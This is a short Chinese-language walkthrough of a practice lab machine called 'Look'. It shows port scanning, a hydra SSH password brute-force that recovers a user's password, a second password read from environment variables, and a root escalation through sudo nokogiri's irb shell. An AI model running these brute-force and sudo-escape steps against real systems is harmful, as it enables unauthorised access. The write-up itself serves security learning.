# 靶场搭建
下载:Look
Nat 模式,IP: 192.168.1.134
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-server-header: Apache/2.4.56 (Debian) | |
|_http-title: Apache2 Debian Default Page: It works |
路径扫描有个 info.php
看一眼细节,发现有个用户叫 axel ,ssh 爆破搞上。
┌──(root㉿kali)-[~] | |
└─# hydra -l axel -P /usr/share/wordlists/rockyou.txt 192.168.1.134 ssh -t 64 -I | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-18 00:19:17 | |
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 | |
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task | |
[DATA] attacking ssh://192.168.1.134:22/ | |
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 14344124 to do in 786:25h, 35 active | |
[22][ssh] host: 192.168.1.134 login: axel password: bambam | |
1 of 1 target successfully completed, 1 valid password found |
拿到了密码 bambam
# 提权
在环境变量中发现 dylanPASS=bl4bl4Dyl4N
拿到了密码,ssh 上去, sudo -l 发现有个 nokogiri
看了下说明运行了一下,不会用。搜一下关键词,发现进去之后的 irb 能利用
dylan@look:/var/www/html$ sudo /usr/bin/nokogiri https://blog.gddfeng.com | |
Your document is stored in @doc... | |
irb(main):001:0> exec '/bin/bash' | |
root@look:/var/www/html# whoami | |
root |
OK 了,root 权限。
# 小结
有 sudo 权限的程序可以尝试运行一下,尽管你不是知道那是什么。然后提取有用的信息进行搜索。
